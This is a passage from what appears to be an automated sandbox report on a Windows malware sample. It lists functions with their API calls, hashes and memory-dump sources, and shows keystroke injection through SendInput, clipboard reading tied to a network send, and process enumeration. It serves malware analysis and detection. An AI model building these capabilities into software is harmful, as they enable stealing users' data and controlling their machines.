                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81d70c20703e66394a8e6e24da3589bfc2c015b76e7b2aedf7d205086cdaf592
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
                                                                                                                                                                                                                                                                                                                              Function 00418ACE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • SendInput.USER32 ref: 00418B18
                                                                                                                                                                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                                                                                                                                                                                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                                                                                                                                                                                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                                                                                                                                                                                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                                                                                                                                                                                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                                                                                                                                                                                                                                                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                                                                                                                                                                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: InputSend$Virtual
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1167301434-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                                                                                                                                                                                                                                                                                                                              Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenClipboard.USER32 ref: 00415A46
                                                                                                                                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                                                                                                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2172192267-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: f5005ee5d472771b7f7389d05c6190c57d7c2149d8b8bb7a7335e6bcd0b45543
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5005ee5d472771b7f7389d05c6190c57d7c2149d8b8bb7a7335e6bcd0b45543
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                                                                                                                                                                                                                                                                                                                              Function 00446169 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                                                                                                              • String ID: a/p$am/pm$fD
                                                                                                                                                                                                                                                                                                                              • API String ID: 3509577899-1143445303
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e0c58fd508ac7f9020f233231798530ee610dc717e528da9a7e0b991552c4189
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0c58fd508ac7f9020f233231798530ee610dc717e528da9a7e0b991552c4189
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                                                                                                                                                                                                                                                                                                              Function 00447E4A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00447ECC
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00447EF0
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00448077
                                                                                                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00448243
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 314583886-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: dfec4532f193feed59ad12990e66811e171abe159fdac3e98e091326569521ad
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 19e3b7565c7c288d74bc5d2e619305edf95ef22548e2b541e8d8082bcdfeb5ac
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfec4532f193feed59ad12990e66811e171abe159fdac3e98e091326569521ad
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27C10671904205ABFB24DF698C41AAE7BB9EF45314F2441AFE484A7251EB388E47C758
                                                                                                                                                                                                                                                                                                                              Function 0044F816 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                                                                                                                                                                                                                                                                                                              Function 00443F8B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00444096
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004440AD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004440CC
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004440E7
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004440FE
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                                                                              • String ID: Z7D
                                                                                                                                                                                                                                                                                                                              • API String ID: 3033488037-2145146825
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                                                                                                                                                                                                                                                                                                              Function 0044A0D3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A115
                                                                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 0044A190
                                                                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 0044A1AB
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1D1
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                                                                                                                                                                                                                                                                                                              Function 02839492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,02839C07,?,00000000,?,00000000,00000000), ref: 028394D4
                                                                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 0283954F
                                                                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 0283956A
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 02839590
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,02839C07,00000000,?,?,?,?,?,?,?,?,?,02839C07,?), ref: 028395AF
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,02839C07,00000000,?,?,?,?,?,?,?,?,?,02839C07,?), ref: 028395E8
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 4b310fb67f00f20eb6abe2c00aab80f96580a2e65146c51cbc88c732e8d597fd
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 8d8766ad6066e8ae94f5492edd27eb0e34c3b0e45341ff96643ce1ca35e81397
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b310fb67f00f20eb6abe2c00aab80f96580a2e65146c51cbc88c732e8d597fd
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3951F37DD00249AFDB11CFA8D895AEEBBF8EF08300F14455AE856E7291E7709951CFA0
                                                                                                                                                                                                                                                                                                                              Function 1001A6A6 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,1001AE1B,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 1001A6E8
                                                                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 1001A763
                                                                                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 1001A77E
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 1001A7A4
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,1001AE1B,00000000,?,?,?,?,?,?,?,?,?,1001AE1B,?), ref: 1001A7C3
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,1001AE1B,00000000,?,?,?,?,?,?,?,?,?,1001AE1B,?), ref: 1001A7FC
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d67dbe8014b1b42e9e6d5a85cdeb93bb72044c9289cf33768a4df2c43ee6b981
                                                                                                                                                                                                                                                                                                                              • Instruction ID: caa66828d063c4f57f6ca3a5c54d23115575f1b669959d2329a9049d7f1fcf44
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d67dbe8014b1b42e9e6d5a85cdeb93bb72044c9289cf33768a4df2c43ee6b981
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A5152719002499FDB10CFA4CC85BDEBBF5EF0A310F15416AE955EB291D730D992CBA1
                                                                                                                                                                                                                                                                                                                              Function 0040E6A3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132processCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                                                                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B197: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1B7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
